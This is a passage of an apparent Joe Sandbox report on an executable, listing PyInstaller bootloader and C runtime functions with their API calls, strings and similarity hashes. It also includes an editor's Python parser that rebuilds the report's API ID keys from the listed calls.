• Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
Similarity
• API ID: ErrorLastValue___vcrt_
• String ID:
• API String ID: 3852720340-0
• Opcode ID: 08a37047ff1fd771ca22d188fb9ec271642c244e2bc4993d5d393c4872d5bfb4
• Instruction ID: 03de621223e499726134e827d4034e8e59c40bb8064c5b55b12ee0099b1d9d96
• Opcode Fuzzy Hash: 08a37047ff1fd771ca22d188fb9ec271642c244e2bc4993d5d393c4872d5bfb4
• Instruction Fuzzy Hash: E101B5329192156DE6162AB4BC95A6E3B54EB117B7F300229FF24451E1EF55480DB360

APIs
• GetModuleHandleW.KERNEL32(00000000,00000000,?,00000000,00000000,00F5218F,00000000,00000000,Failed to obtain/convert traceback!,?,?,?,00000000,00F52EDE,?,?), ref: 00F52013
• DialogBoxIndirectParamW.USER32(00000000,?,00000000,00F51D70,?), ref: 00F520CB
  • Part of subcall function 00F5E365: _free.LIBCMT ref: 00F5E378
• DeleteObject.GDI32(?), ref: 00F520FD
• DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000102), ref: 00F5210F
Strings
• Unhandled exception in script, xrefs: 00F5203C
Memory Dump Source
• Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
• Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
Similarity
• API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam_free
• String ID: Unhandled exception in script
• API String ID: 4039461714-2699770090
• Opcode ID: a942a2babffe53eb3c506c841fe05688f6c63c5a514333ca0b0eed9924e70194
• Instruction ID: 8a8f955bf7b9ae801b611a4617f04d003c3cf147d6d57f131e030d0f9d71f4fe
• Opcode Fuzzy Hash: a942a2babffe53eb3c506c841fe05688f6c63c5a514333ca0b0eed9924e70194
• Instruction Fuzzy Hash: 81311C71508344ABD724AF64CC4DB9FB7E8BF89705F00092ABB8893252D7789509EB53
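Every record in this section carries the same similarity keys: an API ID built from the listed calls, a String ID built from the referenced strings, and fuzzy hashes of the opcodes and instructions. The Python below is an added example written for this page, not part of the Joe Sandbox report or of its tooling. It parses records in the layout shown above and rebuilds the API ID from the API list. The rebuilding rules (split each call name into CamelCase words, drop words shorter than four characters, put words that occur in two or more listed calls before the `$` and the rest after, sort each group by code point) are inferred from the records on this page and are an assumption rather than Joe Sandbox's documented algorithm; they do reproduce every API ID visible in this section. The sample input is two records copied from this page with the page residue removed. Tagging "Failed to decode wchar_t from UTF-8", "win32_utils_from_utf8", "Failed to obtain/convert traceback!" and "Unhandled exception in script" as PyInstaller bootloader error strings is the editor's attribution, consistent with the report's "Found pyInstaller with non standard icon" signature but not stated by the report itself.

```python
"""Parse Joe Sandbox function records (APIs / Strings / Similarity blocks) and
rebuild the "API ID" key from the listed API calls.  The rules are inferred
from the records on this page (an assumption, not Joe Sandbox documentation):
split each listed call into CamelCase words (a leading underscore/lowercase run
such as "__fassign" is one word), drop words shorter than 4 characters (Get,
Set, To, Rtl, W, CP), put words seen in two or more calls before '$' and the
rest after, sort each group by code point, omit an empty group and its '$'.
"""
from __future__ import annotations
import re
from collections import Counter
from dataclasses import dataclass, field

SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
# "<name>.<module>(<args>), ref: <addr>" or "<name>.<module> ref: <addr>"
API_LINE = re.compile(
    r"^(?:Part of subcall function (?P<parent>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>\w+)(?:\.\w+)?(?:\(.*\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)
WORD = re.compile(r"[A-Z][a-z0-9]*|[^A-Z]+")
# PyInstaller bootloader error strings (editor's attribution, consistent with the
# report's "Found pyInstaller" signature; not stated by the report itself).
PYINSTALLER_BOOTLOADER_STRINGS = {
    "Unhandled exception in script", "Failed to obtain/convert traceback!",
    "Failed to decode wchar_t from UTF-8", "Failed to get wchar_t buffer size.",
    "win32_utils_from_utf8"}

@dataclass
class ApiCall:
    name: str
    ref: int                # call-site address
    subcall_of: int | None  # parent function on "Part of subcall function" lines

@dataclass
class FunctionRecord:
    calls: list[ApiCall] = field(default_factory=list)
    strings: list[str] = field(default_factory=list)      # split from "String ID"
    fields: dict[str, str] = field(default_factory=dict)  # Similarity key/values

    @property
    def api_id(self) -> str:
        return self.fields.get("API ID", "")

def parse_blocks(text: str) -> list[FunctionRecord]:
    """One record per 'APIs' heading; bullet lines belong to the current section."""
    records: list[FunctionRecord] = []
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTIONS:
            section = line
            if line == "APIs":
                records.append(FunctionRecord())
            continue
        if not line.startswith("•") or not records:
            continue
        item, rec = line.lstrip("•").strip(), records[-1]
        if section == "APIs" and (m := API_LINE.match(item)):
            parent = int(m["parent"], 16) if m["parent"] else None
            rec.calls.append(ApiCall(m["name"], int(m["ref"], 16), parent))
        elif section == "Similarity":
            key, _, value = item.partition(":")
            rec.fields[key.strip()] = value.strip()
            if key.strip() == "String ID" and value.strip():
                rec.strings = value.strip().split("$")
    return records

def api_words(name: str) -> set[str]:
    """CamelCase words of an API name, minus the short ones the key ignores."""
    return {w for w in WORD.findall(name) if len(w) >= 4}

def rebuild_api_id(calls: list[ApiCall]) -> str:
    counts = Counter(w for c in calls for w in api_words(c.name))
    repeated = sorted(w for w, n in counts.items() if n >= 2)
    single = sorted(w for w, n in counts.items() if n == 1)
    return "$".join("".join(g) for g in (repeated, single) if g)

def pyinstaller_bootloader_hits(rec: FunctionRecord) -> set[str]:
    return {s for s in rec.strings if s in PYINSTALLER_BOOTLOADER_STRINGS}

# Constructed sample: two records copied from this report, page residue removed.
SAMPLE = """\
APIs
• MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,00F5246C,?,?,00000400,?,00000000,00000800), ref: 00F569A8
  • Part of subcall function 00F52290: GetLastError.KERNEL32(?,00000000), ref: 00F522AD
• MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,?,?,00F5246C,?,?,00000400,?,00000000,00000800), ref: 00F56A09
Similarity
• API ID: ByteCharMultiWide$ErrorLast
• String ID: Failed to decode wchar_t from UTF-8$Failed to get wchar_t buffer size.$MultiByteToWideChar$Out of memory.$win32_utils_from_utf8
APIs
• GetModuleHandleW.KERNEL32(00000000,00000000,?,00000000,00000000,00F5218F,00000000,00000000,Failed to obtain/convert traceback!,?,?,?,00000000,00F52EDE,?,?), ref: 00F52013
• DialogBoxIndirectParamW.USER32(00000000,?,00000000,00F51D70,?), ref: 00F520CB
  • Part of subcall function 00F5E365: _free.LIBCMT ref: 00F5E378
• DeleteObject.GDI32(?), ref: 00F520FD
• DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000102), ref: 00F5210F
Strings
• Unhandled exception in script, xrefs: 00F5203C
Similarity
• API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam_free
• String ID: Unhandled exception in script
"""
```

Run `parse_blocks` over a whole saved report and compare `rebuild_api_id(rec.calls)` with `rec.api_id` for each record: a mismatch marks a record where the inferred rule is incomplete and should not be trusted for pivoting. A non-empty `pyinstaller_bootloader_hits(rec)` marks a function as bootloader boilerplate shared by every PyInstaller-built executable rather than code specific to this sample, which is a reason to spend analysis time elsewhere.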

APIs
• FreeLibrary.KERNEL32(00000000,?,?,00F5B464,00000000,00000FA0,00F8EFD4,00000000,?,00F5B58F,00000004,InitializeCriticalSectionEx,00F78F9C,InitializeCriticalSectionEx,00000000), ref: 00F5B433
Memory Dump Source
• Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
• Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
Similarity
• API ID: FreeLibrary
• String ID: api-ms-
• API String ID: 3664257935-2084034818
• Opcode ID: 5ce524a4036252aee3644ccc48d6ac4964de901009f9fce16c89eba327acfaab
• Instruction ID: bfb00436f6f58c1fa964ffd32e11ea06ce6c322b2e68ff0c89c4159eed4c28ea
• Opcode Fuzzy Hash: 5ce524a4036252aee3644ccc48d6ac4964de901009f9fce16c89eba327acfaab
• Instruction Fuzzy Hash: EA11C232E41635ABDB32CF689C49B6D73A4AF01775F250120EE19E7281D770EE05B6D2

APIs
• GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,00F627DC,?,?,00F627A4,?,?,?), ref: 00F627FC
• GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00F6280F
• FreeLibrary.KERNEL32(00000000,?,?,00F627DC,?,?,00F627A4,?,?,?), ref: 00F62832
Memory Dump Source
• Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
• Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
• Opcode ID: 4f4aa37cbaba804fbb56d89cbb37c302ac2ac7de3fe95a4277c523cc798622ee
• Instruction ID: e653d90eb1f1f895340e8867e863371b1b11f3a331b6608098028bd9cbe03460
• Opcode Fuzzy Hash: 4f4aa37cbaba804fbb56d89cbb37c302ac2ac7de3fe95a4277c523cc798622ee
• Instruction Fuzzy Hash: 92F01C3194161CFBDB129BA0DD0AB9D7B79EB44766F144161E809A21A0CBB18F40FAD6

APIs
• GetFileType.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00F5E887), ref: 00F5E977
• GetFileInformationByHandle.KERNEL32(?,?), ref: 00F5E9D1
• GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00F5E887,?,000000FF,00000000,00000000), ref: 00F5EA5F
• __dosmaperr.LIBCMT ref: 00F5EA66
• PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 00F5EAA3
  • Part of subcall function 00F5ED82: __dosmaperr.LIBCMT ref: 00F5EDB7
Memory Dump Source
• Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
• Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
Similarity
• API ID: File__dosmaperr$ErrorHandleInformationLastNamedPeekPipeType
• String ID:
• API String ID: 1206951868-0
• Opcode ID: 76df95aa1384317f23b8c27d8ed51c292bc12d5cbdd1203b9e776b3204b55880
• Instruction ID: f01c8a9091c9dd72ccf263a5a549be62fff9529a95c31a63c779c003bd53733b
• Opcode Fuzzy Hash: 76df95aa1384317f23b8c27d8ed51c292bc12d5cbdd1203b9e776b3204b55880
• Instruction Fuzzy Hash: E3416F75900204ABCB28DFB5DC459AFBBF9FF89311B00451DFA56D3211E7389A48EB10

APIs
• EndDialog.USER32(?,00000002), ref: 00F51D8E
• GetWindowLongW.USER32(?,00000008), ref: 00F51DA4
• InvalidateRect.USER32(?,00000000,00000000), ref: 00F51DC3
• SetWindowLongW.USER32(?,00000008,?), ref: 00F51DDE
• EndDialog.USER32(?,?), ref: 00F51E17
Memory Dump Source
• Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
• Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
Similarity
• API ID: DialogLongWindow$InvalidateRect
• String ID:
• API String ID: 1200242243-0
• Opcode ID: 35951174aebc355fe0551280336abf48a79be2e1335c63e11f7031759b64025a
• Instruction ID: 72ef2eb52f5dba8eb74be57d405bb46dd8eddc84c8882c28aa4925ad534eed54
• Opcode Fuzzy Hash: 35951174aebc355fe0551280336abf48a79be2e1335c63e11f7031759b64025a
• Instruction Fuzzy Hash: 5011E0359042147BE6209B14EC0AFAF77A4FB45322F108C15FE85D62D1C6A5FCC5E6A2
APIs
• _free.LIBCMT ref: 00F6A66C
  • Part of subcall function 00F63B77: RtlFreeHeap.NTDLL(00000000,00000000,?,00F62C8E), ref: 00F63B8D
  • Part of subcall function 00F63B77: GetLastError.KERNEL32(?,?,00F62C8E), ref: 00F63B9F
• _free.LIBCMT ref: 00F6A67E
• _free.LIBCMT ref: 00F6A690
• _free.LIBCMT ref: 00F6A6A2
• _free.LIBCMT ref: 00F6A6B4
Memory Dump Source
• Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
• Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: b70929b96e95927e7c76b1533aa10232e646dffb323cb7073ccf7f308a75ed94
• Instruction ID: 8ce288f14cc29528a7c818f92535e100ec2e2837f3179d362b4bb0b382ad8418
• Opcode Fuzzy Hash: b70929b96e95927e7c76b1533aa10232e646dffb323cb7073ccf7f308a75ed94
• Instruction Fuzzy Hash: B4F03032904244AB8660EB68EC86C7A73EDEE407207A94805F018E7521CB75FCC0AFA5
APIs
  • Part of subcall function 00F53630: _strncat.LIBCMT ref: 00F5368D
• _strncpy.LIBCMT ref: 00F54D1D
  • Part of subcall function 00F53630: _strncat.LIBCMT ref: 00F536B2
• _strncpy.LIBCMT ref: 00F54D46
  • Part of subcall function 00F533E0: _strrchr.LIBCMT ref: 00F533E8
  • Part of subcall function 00F533E0: _strrchr.LIBCMT ref: 00F533F7
Strings
• SPLASH: Cannot extract requirement %s., xrefs: 00F54CD8
• SPLASH: Cannot find requirement %s in archive., xrefs: 00F54D8B
Memory Dump Source
• Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
• Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
Similarity
• API ID: _strncat_strncpy_strrchr
• String ID: SPLASH: Cannot extract requirement %s.$SPLASH: Cannot find requirement %s in archive.
• API String ID: 4078740465-4094522769
• Opcode ID: 5b4eebd5182f27e1bdaa872d5fcffac365495ca491ba9b012dc0650558483d65
• Instruction ID: 2511db4ecb3df59b33a62026420ee0334ea4d0a9160cdb3665004b1fa753839f
• Opcode Fuzzy Hash: 5b4eebd5182f27e1bdaa872d5fcffac365495ca491ba9b012dc0650558483d65
• Instruction Fuzzy Hash: 0851C472404340ABDB21DF54CC85ADF77ECAF85359F000519FE8997202D775A64DEBA2
APIs
Strings
• Cannot allocate memory for necessary files., xrefs: 00F550E1
Memory Dump Source
• Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
• Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
Similarity
• API ID: _strncpy
• String ID: Cannot allocate memory for necessary files.
• API String ID: 2961919466-2795144771
• Opcode ID: d7c7a0e83be8ce285f4e944021e370b58d5a93e31adb349cfac03723dcf3749c
• Instruction ID: 3936028c1cdd2d8b150a77e956c7a3298e567c6c718c49ac081f34ed32a26dd4
• Opcode Fuzzy Hash: d7c7a0e83be8ce285f4e944021e370b58d5a93e31adb349cfac03723dcf3749c
• Instruction Fuzzy Hash: 6241D4B2500205ABDB10DE68DC84EA63398BF44316F080975FF0CCB582D775E598A7B1
Strings
Memory Dump Source
• Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
• Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
Similarity
• API ID:
• String ID: C:\Users\user\Desktop\ceFgl3jkkk.exe
• API String ID: 0-2340494698
• Opcode ID: 1ee21537f8899424de46d14492487d68d136b9319ad74834ea4bb9b305180722
• Instruction ID: 769c05011eb38cc9b8a535f25af5ba234d1ecafb8155463702d38078dff943d7
• Opcode Fuzzy Hash: 1ee21537f8899424de46d14492487d68d136b9319ad74834ea4bb9b305180722
• Instruction Fuzzy Hash: 46319171E00218EFCB21DF99CC819EEBBB8FF99310B144166E804E7211D7B59E44EBA0
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
• Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
Similarity
• API ID: _free
• String ID: TMP
• API String ID: 269201875-3125297090
• Opcode ID: 2b6dec763d7ffd3746eac685c2f9a38739514d2a48c56df694a6c88b8f74af37
• Instruction ID: fa3d2acf416d4f7a16f8131d253360dda85099e39a6b30d901fd219c02cec381
• Opcode Fuzzy Hash: 2b6dec763d7ffd3746eac685c2f9a38739514d2a48c56df694a6c88b8f74af37
• Instruction Fuzzy Hash: FD21937790420A6E5725AA1A9C83D7F73EDEAC277432D802AFC0A9B741EF74DD017261
APIs
• GetModuleFileNameW.KERNEL32(00000000,?,00001000,?,00F52F89,?,?), ref: 00F534CC
  • Part of subcall function 00F52290: GetLastError.KERNEL32(?,00000000), ref: 00F522AD
Strings
• Failed to convert executable path to UTF-8., xrefs: 00F53517
• Failed to get executable path., xrefs: 00F534D6
• GetModuleFileNameW, xrefs: 00F534DB
Memory Dump Source
• Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
• Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
Similarity
• API ID: ErrorFileLastModuleName
• String ID: Failed to convert executable path to UTF-8.$Failed to get executable path.$GetModuleFileNameW
• API String ID: 2776309574-1977442011
• Opcode ID: 7203b36ba09c081e13841837aa3e3abb5763877b420da7cbadbee37e8c27ccf3
• Instruction ID: 4b6baa833ee212b6c71ae0a493299a779dbd1518df30678c6390aaa1cfa8743d
• Opcode Fuzzy Hash: 7203b36ba09c081e13841837aa3e3abb5763877b420da7cbadbee37e8c27ccf3
• Instruction Fuzzy Hash: 6901DD757143006BF618A7249C8B7EB33C9AF54701F804455BF4DC2182F5AC9A0CE697
APIs
Memory Dump Source
• Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
• Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
Similarity
• API ID: _strrchr
• String ID:
• API String ID: 3213747228-0
• Opcode ID: 3e2da1a130bff8e067e98c8726f26c942e917486e4e2f1078dcd2f7c3124a5e2
• Instruction ID: 623d3f7e87e38a1deec7359d066e732d88ff50c55bf4223ad5eb84214dfbaf4b
• Opcode Fuzzy Hash: 3e2da1a130bff8e067e98c8726f26c942e917486e4e2f1078dcd2f7c3124a5e2
• Instruction Fuzzy Hash: 90B13772D002859FDB11CF38C851BEEBBF5EF55354F2481AAE845EB242D6399D01EBA0
APIs
• _free.LIBCMT ref: 00F7014E
• _free.LIBCMT ref: 00F70177
• SetEndOfFile.KERNEL32(00000000,00F6E4B2,00000000,00F68438,?,?,?,?,?,?,?,00F6E4B2,00F68438,00000000), ref: 00F701A9
• GetLastError.KERNEL32(?,?,?,?,?,?,?,00F6E4B2,00F68438,00000000,?,?,?,?,00000000), ref: 00F701C5
Memory Dump Source
• Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
• Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
Similarity
• API ID: _free$ErrorFileLast
• String ID:
• API String ID: 1547350101-0
• Opcode ID: 38b34470736f929ddddc942577d3d0716d7d75d946fcd3805a5bfe3ddab8f019
• Instruction ID: 13ddb5071b192cfb74f8b1ca9e122d77cae321ad4dff42bc04ff47a7b393d20d
• Opcode Fuzzy Hash: 38b34470736f929ddddc942577d3d0716d7d75d946fcd3805a5bfe3ddab8f019
• Instruction Fuzzy Hash: 8E412832900204EBDB15ABB8DC42B9E37B5EF443B0F644552F91CE72A1DEB8D954B722
                                                                                                                      APIs
                                                                                                                      • GetLastError.KERNEL32(?,?,?,00F5C84E,?,?,?,?,00F5C00A,?,?,?), ref: 00F66259
                                                                                                                      • _free.LIBCMT ref: 00F662B6
                                                                                                                      • _free.LIBCMT ref: 00F662EC
                                                                                                                      • SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,?,00F5C00A,?,?,?), ref: 00F662F7
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLast_free
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2283115069-0
                                                                                                                      • Opcode ID: 0a328ae28c16c738952a67607553d029ee42de488aa70b80dd4b02acec98e26e
                                                                                                                      • Instruction ID: 136cb0932026ed6828fda241b995760918b02c09c823bb6373c1d24061a6b29d
                                                                                                                      • Opcode Fuzzy Hash: 0a328ae28c16c738952a67607553d029ee42de488aa70b80dd4b02acec98e26e
                                                                                                                      • Instruction Fuzzy Hash: F11182326046443ADF5137B89CD7E7B3A59DBC1778B340224F924C72E2DEB58D097220
                                                                                                                      APIs
                                                                                                                      • GetLastError.KERNEL32(?,?,?,00F5E61E,00F63B9D,?,?,00F62C8E), ref: 00F663B0
                                                                                                                      • _free.LIBCMT ref: 00F6640D
                                                                                                                      • _free.LIBCMT ref: 00F66443
                                                                                                                      • SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,00F5E61E,00F63B9D,?,?,00F62C8E), ref: 00F6644E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
